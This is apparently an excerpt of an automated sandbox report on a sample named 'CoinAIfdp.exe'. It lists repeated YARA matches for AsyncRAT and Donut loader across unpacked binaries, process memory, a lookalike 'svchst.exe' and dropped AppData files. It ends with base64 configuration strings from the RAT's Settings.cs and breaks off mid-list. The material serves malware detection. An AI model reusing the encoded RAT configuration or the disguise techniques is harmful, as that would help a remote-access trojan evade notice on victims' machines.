                Source: 6.2.CoinAIfdp.exe.55b128d.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 6.2.CoinAIfdp.exe.55b128d.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 6.2.CoinAIfdp.exe.55b128d.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 13.2.svchst.exe.2c66795.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 13.2.svchst.exe.2c66795.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 13.2.svchst.exe.2c66795.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 6.2.CoinAIfdp.exe.6040000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 6.2.CoinAIfdp.exe.6040000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000F.00000002.2725016473.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000010.00000002.1721681170.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000011.00000002.1800707504.00000000028C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000D.00000002.1705552940.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 00000006.00000002.1627064345.0000000000EE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 00000011.00000002.1799807580.0000000000821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000F.00000002.2727513271.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 0000000F.00000002.2727513271.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000F.00000002.2725016473.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: Process Memory Space: CoinAIfdp.exe PID: 3796, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: Process Memory Space: CoinAIfdp.exe PID: 3796, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: Process Memory Space: svchst.exe PID: 4920, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: Process Memory Space: svchst.exe PID: 4920, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: Process Memory Space: svchst.exe PID: 6788, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: Process Memory Space: svchst.exe PID: 6788, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: Process Memory Space: CoinAIfdp.exe PID: 2396, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: Process Memory Space: CoinAIfdp.exe PID: 2396, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: Process Memory Space: svchst.exe PID: 1608, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, cl5fowJh7yxNN2fIgNI.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, cl5fowJh7yxNN2fIgNI.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, cl5fowJh7yxNN2fIgNI.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, Settings.csBase64 encoded string: 'IktYzmeBL3sqI7MbtNwmDlY5Hl5jYuvJ6mqLO5ieg6NR8Rm+Fy2K+UtvY40FJGkFur3tuDEDyY0+2irPMkSsEw==', '/e7N2vcKvkG3uYcb8CLGT7IIcNcNSPNJ854BEG6vRMABRw8TChoVkkF2Yyfa7LaG6pcKLwM4HgnDKwJLD6SdHA==', 'SZ+2mntHgU68CKySNnoNSxuhMBM+7c9KvnWVLuPmt5rHmg9RHTHW8BWoBZuUwkuCyx7Z7KWRwzzcRZ3j1Ek83g==', 'YSiYPcZO8xl1HAUFya3+djvQEXRnwtYCf/DfWtqbNQfNn1ZHqPs9XTOuv533RHNW/hXHUjXtKzr3+9VEenQj+g==', 'NL7ihy/ayhSShDQiRtDG9DQ+MkG4pr72KW4bDzBnZZh/RiVUPqaP9g/f7c52xyVqYdIar4xNoZOTAuCmUoaRu5pHSJyuafxpl49Cj15inc8=', 'stBMPaCseohw48pQ5j+jieFCpmrBd4rTK1Zvk5A+hcR1EjzVv6UNardciPj5rKcyUb4/Mg+M3Zi+FV09AhSveRMXl0FOwWjKaEbhnFIT60XI6/gG1KTQMr6yZ1QtG4LVe9V3TmczZj7fWN+E6l+Vyc6YdxDOywsTEKqOsPFoPp04HwNes7st3tf4xVlDXrn88XewCZ7LY09n4ht/GObRXgJeK2tKqck6gcn5I/kCw4pZDW4jPQ1XrPwGa4Hi+MIsfi4OrxsPF90qH/QX26+iPizLYAZD0YJDHeaqCxM9yDyMs4/PD+mL6TB3MSgDu5KLuKma+ekkz3HT+bDoa+9UxerSHCSaV6YLOqownJbP+IFURi0CH45wsA/v5fuG44/MeD7F7hwHYHUbVCX1jLUjoumXH4p02ldEL7/A0IF64dCUlm6wXbqAy4m15mg2BYIRfAYKhJlNVaf/MQ/mQW7iPIJGnDtJLFZVDnX6scsLLX2hQXD9AXZuAyF2dws8BkWtTch+YPBkrsaR+OwJzmEGk4FrSMWIZJHAJak4BwGtnwBEzgHeI5R2jQCBhqcF1+ezuNmNmyMiStDD6XW0BOctfbXLo9yQaTIEP74LpzZVZt5gbgoneu7zykSzNrwfSG3NBaoxBAdM1z3UTEBAxaHXHat0wxfL3yqfrjlAWPMfWG0XUOS00xpJPHDhRZYoXa+mH8lUe9FMqFNZzWkwN9ERt5RnBVyoz8Z0d+8Vc0uZoaZ5xdX94ColF0MlIubPRCuvDcAjh6aHb6XzdsYzd8nGgxcOjkdJ0HC/4sN8N9ewcyMeZ4UYXy/8WpbNdYvYPjBMmw73KrtqNmMgXx/Q+W51pkOJnsBCzkqB/JsoTLIO8kkVNXa5h8yc1gCgG/0O6nyMI7pWHxzAkux1tDFNAawVscfIWlj5unqAcGS2XP/yWiGOdJGMxd+A37mJ+kfuQDOzZvnNr8PG3gOGA7EqovErZg==', 'XlJmXPQTjwboANulS9LnwIILBKq/C35BTm8KIAMb8foem7G2GugOGhd3LaKvT4x0FLgzAdHtYEmqWyNHyTJscQ==', 'xgc/DrNayvH+qStYwh5PdHcrFAKMePynDoZI0y1/d9HprMWNE7Dp3Al5+nwN5tcxMmJ1Ywomr6dq+A5l4AZ+NQ==', 'Y7t3wwf932TvdvOqbSa66BoOxuApNMvFkfUnK6B9qryvqz1qRD0TujKRdcA4lL57EUeB63fXrGQvXvnWj2qJFg=='
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, Settings.csBase64 encoded string: 'IktYzmeBL3sqI7MbtNwmDlY5Hl5jYuvJ6mqLO5ieg6NR8Rm+Fy2K+UtvY40FJGkFur3tuDEDyY0+2irPMkSsEw==', '/e7N2vcKvkG3uYcb8CLGT7IIcNcNSPNJ854BEG6vRMABRw8TChoVkkF2Yyfa7LaG6pcKLwM4HgnDKwJLD6SdHA==', 'SZ+2mntHgU68CKySNnoNSxuhMBM+7c9KvnWVLuPmt5rHmg9RHTHW8BWoBZuUwkuCyx7Z7KWRwzzcRZ3j1Ek83g==', 'YSiYPcZO8xl1HAUFya3+djvQEXRnwtYCf/DfWtqbNQfNn1ZHqPs9XTOuv533RHNW/hXHUjXtKzr3+9VEenQj+g==', 'NL7ihy/ayhSShDQiRtDG9DQ+MkG4pr72KW4bDzBnZZh/RiVUPqaP9g/f7c52xyVqYdIar4xNoZOTAuCmUoaRu5pHSJyuafxpl49Cj15inc8=', 